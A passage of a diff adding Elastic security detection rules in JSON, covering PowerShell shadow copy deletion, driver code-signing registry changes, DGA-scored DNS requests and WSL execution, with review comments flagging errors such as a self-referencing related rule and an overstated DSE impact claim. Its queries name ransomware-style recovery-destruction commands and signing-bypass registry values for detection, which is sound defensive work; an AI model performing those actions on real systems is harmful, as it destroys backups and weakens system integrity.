non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d99a037b-c8e2-47a5-97b9-170d076827c4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_111.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_111.json new file mode 100644 index 00000000000..c0201aecbc2 --- /dev/null 
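Review bot: The "Related rules" section of the `note` lists `Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4`, which is this rule's own `rule_id`, so the entry points the analyst back at the alert they are already triaging. The same self-reference appears in the `_111` copy of this rule in the next hunk. Either drop that bullet or replace it with the sibling rule that was actually intended; the VssAdmin entry on the line above is the only usable cross-reference at the moment.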
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_111.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow copy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch 
activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy", + "https://powershell.one/wmi/root/cimv2/win32_shadowcopy", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d99a037b-c8e2-47a5-97b9-170d076827c4_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_8.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_8.json new file mode 100644 index 00000000000..0f41b64286b --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_8.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Registry", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"HKU\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\"\n ) and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense 
Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_9.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_9.json new file mode 100644 index 00000000000..64f9bda2ec1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_9.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Registry", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"HKU\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\"\n ) and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense 
Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_3.json b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_3.json new file mode 100644 index 00000000000..bdd39dd4db9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_3.json 
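Review bot: The investigation guide in `note` frames this rule as detecting modifications that "can disable DSE" (kernel-mode Driver Signature Enforcement), but the value the `query` watches, `Software\Policies\Microsoft\Windows NT\Driver Signing\BehaviorOnFailedVerify` under the user hives, is the Group Policy "Code signing for device drivers" setting (Ignore/Warn/Block) that governs how unsigned driver *installation* is handled for that user; as far as I know it does not switch off 64-bit kernel code-integrity enforcement, which needs boot-configuration changes or an exploit. Triage analysts who read the guide literally may overstate impact, so consider a sentence such as `This rule identifies changes to the per-user driver-signing installation policy (Ignore/Warn); it is a precursor to loading untrusted drivers rather than a direct DSE bypass — confirm kernel-mode enforcement separately (e.g. bcdedit /enum for testsigning or nointegritychecks).` The same wording is carried in the version 8 snapshot added above, so both copies would need the correction if the guide is regenerated.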
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity.", + "from": "now-10m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Machine Learning Detected a DNS Request With a High DGA Probability Score", + "query": "ml_is_dga.malicious_probability > 0.98\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "ml_is_dga.malicious_probability", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "da7f5803-1cd4-42fd-a890-0173ae80ac69", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. 
\n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. 
This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + 
"version": 3 + }, + "id": "da7f5803-1cd4-42fd-a890-0173ae80ac69_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6.json new file mode 100644 index 00000000000..01f8f89e4ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6.json 
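Review bot: The `setup` text tells operators to use "the ingest pipeline named `-ml_dga_ingest_pipeline`"; a pipeline name that begins with a hyphen looks like a version prefix was lost when the text was templated, and an operator cannot find the pipeline from this string, so it should read something like `the ingest pipeline named <DGA package version>-ml_dga_ingest_pipeline (see Stack Management → Ingest Pipelines for the exact name)`. The same block lists Packetbeat as a supported DNS source, yet `index` only covers `logs-endpoint.events.*` and `logs-network_traffic.*`, so Packetbeat's default `packetbeat-*` indices are never queried unless the user also edits the rule's index patterns — either add `"packetbeat-*"` to `index` or state that requirement in the setup steps. Finally, `required_fields` declares `ml_is_dga.malicious_probability` with `"type": "unknown"` while the custom component-template mapping quoted in the same setup text maps it as `float`; declaring `"type": "float"` keeps the rule metadata consistent with the mapping it asks operators to install.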
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to execute a program on the host from the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via Windows Subsystem for Linux", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n process.parent.name : (\"wsl.exe\", \"wslhost.exe\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files*\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux_*\\\\wsl*.exe\",\n \"?:\\\\Windows\\\\System32\\\\conhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\Sys*\\\\wslconfig.exe\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + 